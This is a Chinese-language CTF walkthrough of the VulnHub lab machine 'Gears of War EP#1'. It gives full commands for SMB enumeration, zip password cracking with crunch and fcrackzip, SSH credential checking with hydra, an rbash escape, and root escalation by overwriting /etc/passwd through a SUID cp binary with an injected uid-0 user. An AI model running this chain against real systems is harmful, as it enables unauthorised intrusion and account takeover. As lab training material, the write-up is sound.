VulnHub-Gears-of-War-1

admin
admin
admin
102367
文章
87
评论
2023年12月15日08:50:14评论36 views字数 2184阅读7分16秒阅读模式
title: VulnHub-Gears-of-War-1
categories:
  - VulnHub
tags:
  - Linux
  - zip
  - CVE-2018-7600
  - gobuster
  - nmap
  - SMB
  - Samba
  - suid
  - smbmap
  - hydra
  - crunch
  - fcrackzip
cover: /images/Vulnhub.png

abbrlink: 8c8082bf

0x01 靶机介绍

  • Name: Gears of War: EP#1

  • Date release: 17 Oct 2019

  • Author: eDu809

  • Series: Gears of War

  • Description: Its a CTF machine that deals with the history of gears of war, where we must try to escape from prison and obtain root privileges. it has some rabbit holes, so you have to try to connect the tracksbrew to get access.

靶机下载地址:https://www.vulnhub.com/entry/gears-of-war-ep1%2C382/

0x02 侦查

端口探测

使用 nmap 进行端口扫描

nmap -p- -sV -sC -A 192.168.0.105 -oA nmap_Gears-of-War#1

VulnHub-Gears-of-War-1

扫描结果显示开放了22、80、139和445端口。
80端口
访问http://192.168.0.105后为战争图片

VulnHub-Gears-of-War-1目录探测

使用 gobuster 对目录进行扫描,但未发现可疑目录

gobuster dir -u http://192.168.0.105 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt

VulnHub-Gears-of-War-1SMB匿名登录

使用 smbmap 列出 SMB 共享,成功发现目录LOCUS_LAN$

smbmap -H 192.168.0.105

VulnHub-Gears-of-War-1

列出其中文件,成功找到SOS.txt和msg_horda.zip

smbmap -H 192.168.0.105 -R

VulnHub-Gears-of-War-1

使用 enum4linux 检查 SMB 服务

enum4linux 192.168.0.105

VulnHub-Gears-of-War-1

成功找到用户 marcus、root 等

enum4linux 192.168.0.105 -R | grep Local

VulnHub-Gears-of-War-1

0x03 上线[marcus]

ZIP密码破解

使用 smbclient 连接共享LOCUS_LAN$

smbclient //192.168.0.105/LOCUS_LAN$

通过 SMB 服务下载文件

smb > get SOS.txtsmb > get msg_horda.zip

VulnHub-Gears-of-War-1

查看文本并尝试解压压缩包,结果显示文本中存在密码,而压缩包解压需要密码,但经尝试后该密码并不是解压密码

cat SOS.txtunzip  msg_horda.zip

VulnHub-Gears-of-War-1

使用 crunch 生成4位密码字典

crunch 4 4 -t @%%, -o passwords

VulnHub-Gears-of-War-1

相关参数详情如下:

@ 插入小写字母, 插入大些字母% 插入数字^ 插入特殊字符

查看生成的密码字典

VulnHub-Gears-of-War-1

使用 fcrackzip 借助字典破解压缩文件,成功拿到密码r44M

fcrackzip -D -v -u -p passwords msg_horda.zip

VulnHub-Gears-of-War-1

解压压缩文件,成功发现文本key.txt,其中存在密码3_d4y

unzip msg_horda.zipmore key.txt

VulnHub-Gears-of-War-1SSH登录

使用 hydra 验证 SSH 的登录信息是否为marcus/3_d4y

hydra -L users -p 3_d4y ssh://192.168.0.105

VulnHub-Gears-of-War-1

成功通过 marcus 用户登录 SSH

ssh marcus@192.168.0.105

VulnHub-Gears-of-War-1

0x04 权限提升[root]

信息收集

登录后发现当前命令行为 rbash,即为受限制的bash,主要不能执行以下几种情况

1、使用命令cd更改目录2、设置或者取消环境变量的设置(SHELL, PATH, ENV, or BASH_ENV)3、指定包含参数'/'的文件名4、指定包含参数' - '的文件名5、使用重定向输出'>', '>>', '> |', '<>' '>&','&>'

由于存在诸多限制,因此需要尝试绕过,使用以下命令可进行绕过

ssh marcus@192.168.0.105 -t "bash -noprofile"

VulnHub-Gears-of-War-1

suid提权

查找带有 suid 的特权文件,在其中成功发现 cp 命令

find / -type f -perm -u=s 2>/dev/null

VulnHub-Gears-of-War-1

把/etc/passwd复制至/tmp目录下

cat /etc/passwdcat /etc/passwd > /tmp/passwd

VulnHub-Gears-of-War-1

使用 openssl 生成 mac 用户哈希

openssl passwd -1 -salt mac 123456

VulnHub-Gears-of-War-1

为新建的用户添加root用户组权限,同时添加至/tmp/passwd

mac:$1$mac$hKt6m/mS5roM05SKHksDf.:0:0:root:/root:/bin/bash

利用 cp 命令把/tmp/passwd替换为/etc/passwd

cp /tmp/passwd /etc/passwd

VulnHub-Gears-of-War-1

通过 su 命令切换至新用户 mac 并最终提权至 root 权限

su maccd ~

VulnHub-Gears-of-War-1

发现文件.flag.txt并成功拿到flag

ls -lacat .flag.txt

VulnHub-Gears-of-War-1

原文始发于微信公众号(狐狸说安全):VulnHub-Gears-of-War-1

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年12月15日08:50:14
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   VulnHub-Gears-of-War-1http://cn-sec.com/archives/2299859.html

发表评论

匿名网友 填写信息